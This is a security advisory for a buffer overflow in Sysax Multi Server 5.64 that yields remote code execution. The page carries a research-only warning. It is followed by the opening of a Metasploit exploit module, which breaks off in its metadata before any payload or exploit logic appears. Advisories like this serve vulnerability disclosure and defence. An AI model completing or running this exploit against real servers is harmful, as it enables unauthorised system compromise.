Sysax Multi Server Function Buffer Overflow Vulnerability

Published: 2012-07-29
Updated: 2012-07-31

Affected systems:
sysax Sysax Multi Server 5.64
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54713

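Sysax Multi Server is an SSH2 and FTP server for the Windows platform.

Sysax Multi Server 5.64 and earlier versions contain a buffer overflow vulnerability in their implementation. An attacker can exploit this vulnerability to execute arbitrary code with elevated privileges.

<*Source: Matt Andreko
  *>

Test method: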
--------------------------------------------------------------------------------

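Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Matt Andreko () provided the following test method: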


require 'msf/core'
require 'base64'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'      => 'Sysax Multi Server 5.64 Create Folder BoF',
            'Description'   => %q{
                    This module exploits a stack buffer overflow in the create folder function
                    in Sysax Multi Server 5.64. This issue was fixed in 5.66.

                    You must have valid credentials to trigger the vulnerability. Your credentials
                    must also have the create folder permission and the HTTP option has to be enabled.
                    This module will log into the server, get a SID token and then proceed to exploit
                    the server. Successful exploits result in LOCALSYSTEM access. This exploit works on
                    XP SP3, and Server 2003 SP1-SP2.
            },
            'License'   => MSF_LICENSE,
            'Author'    =>
                [
                    'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64
                    'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50
                ],
            'Version'   => '$Revision:$',
            'References'    =>
                [
                    [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update
                    [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Platform'  => 'win',
            'Payload'   =>
                {
                    'BadChars' => "\x00\x2F",
                },
